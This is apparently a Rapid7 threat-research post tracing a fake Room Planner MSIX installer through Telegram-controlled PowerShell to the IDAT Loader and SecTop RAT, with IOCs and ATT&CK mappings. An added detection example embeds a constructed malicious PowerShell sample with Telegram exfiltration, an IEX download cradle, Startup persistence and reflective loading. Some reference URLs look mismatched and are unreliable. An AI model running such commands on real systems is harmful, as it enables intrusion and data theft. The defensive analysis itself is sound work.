Last updated Wednesday, April 10, 2024, 14:32:16 GMT

Rapid7's Managed Detection and Response (MDR) team continuously monitors our customers' environments, identifying emerging threats and developing new detections.

In August 2023, Rapid7 identified a new malware loader named the IDAT Loader. Malware loaders are a type of malware designed to deliver and execute additional malware on a victim's system. What makes the IDAT Loader unique is the way it retrieves data from PNG files, searching for offsets beginning with 49 44 41 54 (IDAT).

In the first part of our blog series, we discussed how a Rust-based application was used to download and execute the IDAT Loader. In this second part of the series, we analyze how an MSIX installer led to the download and execution of the IDAT Loader.

Threat actors using MSIX packages to distribute malicious code is nothing new; what distinguished this incident was the attack flow of the compromise. Based on the tactics, techniques and procedures (TTPs) recently observed, we believe this activity is linked to a financially motivated threat group.

Figure 1 - Attack Flow

MSIX Installer

In January 2024, Red Canary published an article attributing various deployments of malicious MSIX installers to different threat actors. The MSIX installers employed a variety of techniques to deliver the initial payload onto compromised systems.

All infections began with users navigating to typosquatted URLs after using a search engine to find a download for a specific software package. Typosquatting, also known as URL hijacking, is a technique in which threat actors register domains that closely resemble legitimate ones in order to deceive users. The threat actors mimic the layout of the legitimate website to lure users into downloading their initial payload.

Additionally, threat actors use a technique known as SEO poisoning, which allows them to ensure their malicious websites appear near the top of a user's search results.

Technical Analysis

Typosquatted Malvertising

In our most recent incident involving the IDAT Loader, Rapid7 observed a user downloading an installer for an application named "Room Planner" from a website impersonating the legitimate site. The user had searched for the "Room Planner" app on Google and clicked the URL hxxps://roomplannerapp.cn[.]com. After user interaction, the user's browser was directed to download an MSIX package, Room_Planner-x86.msix (SHA256: 6f350e64d4efbe8e2953b39bfee1040c8b041f6f212e794214e1836561a30c23).

Figure 2 - Malvertised Site for Room Planner Application

PowerShell Script

During execution of the MSIX file, a PowerShell script, 1.ps1, is dropped into the folder path C:\Program Files\WindowsApps\RoomPlanner.RoomPlanner_7.2.0.0_x86__s3garmmmnyfa0\ and executed. Rapid7 determined that it does the following:

  • Obtain the IP address of the compromised asset
  • Send the IP address of the compromised asset to a Telegram bot
  • Retrieve an additional PowerShell script that is hosted on the Telegram bot
  • Delete the message containing the IP address of the compromised asset
  • Invoke the PowerShell script retrieved from the Telegram bot

Figure 3 - PowerShell script 1.ps1 contained within MSIX file Room_Planner-x86.msix

In a controlled environment, Rapid7 accessed the Telegram bot hosting the next-stage PowerShell script and determined that it does the following:

  • Retrieve the IP address of the compromised asset using Invoke-RestMethod, which fetches data from the domain icanhazip[.]com
  • Enumerate the compromised asset's operating system, domain and AV products
  • Send the information to the Telegram bot
  • Create a randomly generated 8-character name and assign it to the variable $JAM
  • Download a GPG file from the URL hxxps://read-holy-quran[.]group/ld/cr.tar.gpg, saving the file into %APPDATA% under the name assigned to the $JAM variable
  • Decrypt the contents of the GPG file using the passphrase ‘riudswrk’, saving them into a newly created folder named after the $JAM variable within C:\ProgramData\cr\$JAM as a .RAR archive file
  • Extract the RAR file using tar
  • Start an executable named run.exe from the newly created folder
  • Create a link (.lnk) file in the Startup folder, named after the randomly generated name stored in variable $JAM, pointing to run.exe stored in the file path C:\ProgramData\cr\$JAM in order to establish persistence
  • Read in another PowerShell script hosted on a Pastebin site, hxxps://pastebin.pl/view/raw/a137d133, using DownloadString and execute its contents via IEX (Invoke-Expression); this PowerShell script is a tool used to bypass AMSI
  • Download data from the URL hxxps://kalpanastickerbindi[.]com/1.jpg, reflectively load the contents and execute the program starting from the function EntryPoint (indicating that the downloaded data is a .NET assembly binary)
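The chain above leaves distinctive traces in PowerShell script block logging. The following detection logic is an added example, not code from the original post or from Rapid7: it scores a script block against one pattern per stage described above and alerts only when several stages co-occur. The two script blocks it is run over are constructed for this example; the real script's command lines are not reproduced on the page.

```python
import re


def refang(text: str) -> str:
    """Undo common defanging (hxxp, [.]) so shared or defanged logs still match."""
    return text.replace("hxxp", "http").replace("[.]", ".")


# One regex per stage of the Telegram-hosted script. Patterns follow the
# behaviours described in the analysis, not the real script's exact lines.
INDICATORS = {
    "external_ip_lookup":  re.compile(r"Invoke-RestMethod[^\n]*icanhazip", re.I),
    "telegram_bot_api":    re.compile(r"api\.telegram\.org/bot", re.I),
    "gpg_passphrase":      re.compile(r"\bgpg\b[^\n]*--passphrase", re.I),
    "tar_extracts_rar":    re.compile(r"\btar\b[^\n]*\.rar\b", re.I),
    "startup_lnk":         re.compile(r"\\Startup\\[^\n]*\.lnk", re.I),
    "downloadstring_iex":  re.compile(r"\b(IEX|Invoke-Expression)\b[^\n]*DownloadString", re.I),
    "reflective_net_load": re.compile(r"Reflection\.Assembly\]::Load|EntryPoint\.Invoke", re.I),
}


def score_script_block(script_text: str) -> dict:
    """Return the matched stages and an alert flag. Three distinct stages are
    required: a lone download cradle is common in admin tooling, the chain is not."""
    text = refang(script_text)
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    return {"hits": hits, "alert": len(hits) >= 3}


# Constructed script-block text (Event ID 4104 style) mimicking the described chain.
SAMPLE_MALICIOUS = r"""
$ip = Invoke-RestMethod -Uri 'hxxps://icanhazip[.]com'
Invoke-RestMethod -Uri "hxxps://api.telegram[.]org/bot<TOKEN>/sendMessage" -Method Post -Body @{chat_id=1;text=$ip}
$JAM = -join ((65..90) | Get-Random -Count 8 | ForEach-Object {[char]$_})
gpg --batch --passphrase riudswrk -o "$env:ProgramData\cr\$JAM\$JAM.rar" -d "$env:APPDATA\$JAM"
tar -xf "$env:ProgramData\cr\$JAM\$JAM.rar" -C "$env:ProgramData\cr\$JAM"
$s = (New-Object -ComObject WScript.Shell).CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\$JAM.lnk")
IEX (New-Object Net.WebClient).DownloadString('hxxps://pastebin[.]pl/view/raw/a137d133')
$a = [Reflection.Assembly]::Load($bytes); $a.EntryPoint.Invoke($null, $null)
"""

# Constructed benign admin script: it also makes a web request, but no other stage.
SAMPLE_BENIGN = r"""
$status = Invoke-RestMethod -Uri 'https://inventory.corp.example/api/health'
Get-ChildItem "$env:ProgramData\Logs" | Where-Object Length -gt 1MB
"""

if __name__ == "__main__":
    for label, block in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, score_script_block(block))
```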

Figure 4 - PowerShell script hosted on the API bot

Figure 5 - PowerShell AMSI bypass tool

After analysis of the AMSI (Anti Malware Scan Interface) bypass tool, we observed that it was a custom tool giving credit to a website, hxxps://rastamosue[.]memory-patching-amsi-bypass, which discusses how to create a program that can bypass AMSI scanning.

AMSI is a scanning tool designed to inspect scripts for potentially malicious code after a scripting engine attempts to run them. If the content is deemed malicious, AMSI tells the scripting engine (in this case PowerShell) not to run the code.

RAR Contents

Contained within the RAR file were the following files:

| File | Description |
|---|---|
| Dharna.7z | File contains the encrypted IDAT Loader config |
| Guar.xslx | File contains random bytes, not used during infection |
| Run.exe | Renamed WebEx executable file, used to sideload DLL WbxTrace.dll |
| Msvcp140.dll | Benign DLL read by Run.exe |
| PtMgr.dll | Benign DLL read by Run.exe |
| Ptusredt.dll | Benign DLL read by Run.exe |
| Vcruntime140.dll | Benign DLL read by Run.exe |
| Wbxtrace.dll | Corrupted WebEx DLL containing the IDAT Loader |
| WCLDll.dll | Benign WebEx DLL read by Run.exe |

After analyzing the folder contents, Rapid7 determined that one of the DLLs, wbxtrace.dll, had a corrupted signature, indicating that its original code had been tampered with. After analyzing the modified WebEx DLL, wbxtrace.dll, Rapid7 determined that the DLL contained suspicious functionality resembling the IDAT Loader.

Figure 6 - Analysis showing Corrupt Signature of wbxtrace.dll

Upon extracting the contents of the RAR file to the directory path C:\ProgramData\cr, the PowerShell script executes the run.exe executable.

The IDAT Loader

During execution of run.exe (a legitimate, renamed WebEx executable), the executable sideloads the tampered WebEx DLL, wbxtrace.dll. Once the DLL wbxtrace.dll is loaded, it executes a section of new code containing the IDAT Loader, which reads in the contents of dharna.7z.

After reading the contents of dharna.7z, the IDAT Loader searches for the offset 49 44 41 54 (IDAT) followed by C6 A5 79 EA. After locating this offset, the loader reads in the following 4 bytes, E1 4E 91 99, which are used as the decryption key for the remaining contents. Contained within the decrypted contents are additional code, specific DLL and executable file paths, and the final encrypted payload, which is decrypted using a 200-byte XOR key.
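The marker-and-key layout just described, worked as an added example that is not part of the original post or of the Rapid7 Labs extractor: the parser walks a blob for an IDAT tag followed by C6 A5 79 EA, skips ordinary PNG IDAT chunks that lack the magic, takes the next four bytes as the key and decrypts the remainder. The page confirms XOR only for the 200-byte final key; applying the 4-byte stage key as a repeating XOR is an assumption, and the blob is constructed here, not a real dharna.7z.

```python
IDAT_TAG = b"IDAT"                         # 49 44 41 54
LOADER_MAGIC = bytes.fromhex("C6A579EA")   # must follow the tag for the loader to use it
INCIDENT_KEY = bytes.fromhex("E14E9199")   # 4-byte key observed in this incident


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. The page confirms XOR for the 200-byte final-payload key;
    using it for the 4-byte stage key as well is an assumption of this example."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def find_loader_blob(data: bytes):
    """Return (tag_offset, key, decrypted_remainder) for the first IDAT tag that is
    followed by LOADER_MAGIC, or None. Plain PNG IDAT chunks lack the magic and are skipped."""
    pos = 0
    while (pos := data.find(IDAT_TAG, pos)) != -1:
        after = pos + len(IDAT_TAG)
        if data[after:after + 4] == LOADER_MAGIC:
            key = data[after + 4:after + 8]
            if len(key) < 4:          # truncated file: marker present but no key
                return None
            return pos, key, xor_with_key(data[after + 8:], key)
        pos = after
    return None


def build_sample(plaintext: bytes, key: bytes = INCIDENT_KEY) -> bytes:
    """Constructed test blob (not a real sample): PNG signature, a decoy IDAT chunk
    with ordinary data and CRC, then the loader's tag, magic, key and XORed plaintext."""
    png_signature = bytes.fromhex("89504E470D0A1A0A")
    decoy_chunk = b"\x00\x00\x00\x04" + IDAT_TAG + b"\x01\x02\x03\x04" + b"\x00\x00\x00\x00"
    return png_signature + decoy_chunk + IDAT_TAG + LOADER_MAGIC + key + xor_with_key(plaintext, key)


if __name__ == "__main__":
    # Stand-in for the decrypted stage: a path string, since the real contents hold DLL/EXE paths.
    blob = build_sample(b"C:\\Windows\\System32\\cmd.exe")
    offset, key, payload = find_loader_blob(blob)
    print(f"loader tag at offset {offset}, key {key.hex()}, decrypted: {payload!r}")
```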

The IDAT Loader employs advanced techniques such as Process Doppelganging and Heaven's Gate in order to initiate new processes and inject additional code. This strategy enables the loader to evade antivirus detection and successfully load the final stage, SecTop RAT, into the newly created process, msbuild.exe.

We recently developed a configuration extractor that is able to decrypt the payload hidden within files containing IDAT (49 44 41 54) sections. The configuration extractor can be found on our Rapid7 Labs GitHub page.

After using the configuration extractor, we analyzed the SecTop RAT and determined that it communicates with the IP address 91.215.85[.]66.

Rapid7 Customers

InsightIDR and Managed Detection and Response customers already have existing detection coverage through Rapid7's expanded detection rule library. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections that are deployed and will alert on the described activity:

  • Attacker Technique - Advanced Installer .MSI Executable Spawns Powershell
  • Suspicious Process - Execution From Root of ProgramData
  • Suspicious Process - PowerShell Uncommon Upper And Lower Case Combinations
  • Suspicious Process - Explorer.exe in Non-Standard Location

MITRE ATT&CK Techniques

| Tactic | Technique | Details |
|---|---|---|
| Execution | Command and Scripting Interpreter: PowerShell (T1059.001) | 1.ps1 is used to identify the compromised machine and execute additional PowerShell scripts |
| Execution | Native API (T1106) | The IDAT injector and IDAT loader use the Heaven's Gate technique to evade detection |
| Execution | User Execution: Malicious File (T1204.002) | User executes the binary Room_Planner-x86.msix |
| Defense Evasion | Masquerading: Match Legitimate Name or Location (T1036.005) | Malicious MSIX masquerades as the legitimate Room Planner installer |
| Defense Evasion | Deobfuscate/Decode Files or Information (T1140) | gpg.exe is used to decrypt cr.tar.gpg |
| Defense Evasion | Hijack Execution Flow: DLL Search Order Hijacking (T1574.001) | run.exe loads the malicious wbxtrace.dll |
| Defense Evasion | Reflective Code Loading (T1620) | PowerShell script loads a binary hosted at kalpanastickerbindi[.]com/1.jpg |
| Defense Evasion | Process Injection (T1055) | The IDAT injector implements the NtCreateSection + NtMapViewOfSection code injection technique to inject into the cmd.exe process |
| Defense Evasion | Process Injection: Process Doppelganging (T1055.013) | The IDAT Loader implements the Process Doppelganging technique to load the SecTop RAT |
| Defense Evasion | Virtualization/Sandbox Evasion: Time Based Evasion (T1497.003) | Execution delays are performed by several stages throughout the attack flow |

IOCs

| IOC | SHA256 | Notes |
|---|---|---|
| Room_Planner-x86.msix | 6f350e64d4efbe8e2953b39bfee1040c8b041f6f212e794214e1836561a30c23 | Initial installer containing PowerShell scripts |
| 1.ps1 | 928bd805b924ebe43169ad6d670acb2dfe45722e17d461ff0394852b82862d23 | Dropped and executed by Room_Planner-x86.msix |
| wbxtrace.dll | 1D0DAF989CF28852342B1C0DFEE05374860E1300106FF7788BBA26D84549B845 | Malicious DLL executed by run.exe, a renamed Cisco Webex binary |
| Dharna.7z | B7469153DC92BF5DE9BF2521D9550DF21BC4574D0D0CFC919FF26D1071C000B2 | Encrypted payload decrypted by wbxtrace.dll |
| read-holy-quran[.]group/ld/cr.tar.gpg | | Hosts the GPG file containing the RAR file |
| kalpanastickerbindi[.]com/1.jpg | | Hosts the .NET executable downloaded by the API bot PowerShell script |
| 91.215.85[.]66 | | SecTop RAT IP address |

References

| Article | URL |
|---|---|
| MSIX installer malware delivery on the rise across multiple campaigns | http://redcanary.com/blog/msix-installers/ |
| Process Doppelganging | http://malware.news/t/uncovering-the-serpent/76253 |
| Analysis of Heaven's Gate Part 1 | http://sachiel-archangel.medium.com/analysis-of-heavens-gate-part-1-62cca0ace6f0 |
| Fake Update Utilizes New IDAT Loader To Execute StealC and Lumma Infostealers | http://n5sw.freeonlinekitchendesigntool.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/ |
| Stories from the SOC Part 1: IDAT Loader to BruteRatel | http://n5sw.freeonlinekitchendesigntool.com/blog/post/2024/03/28/stories-from-the-soc-part-1-idat-loader-to-bruteratel/ |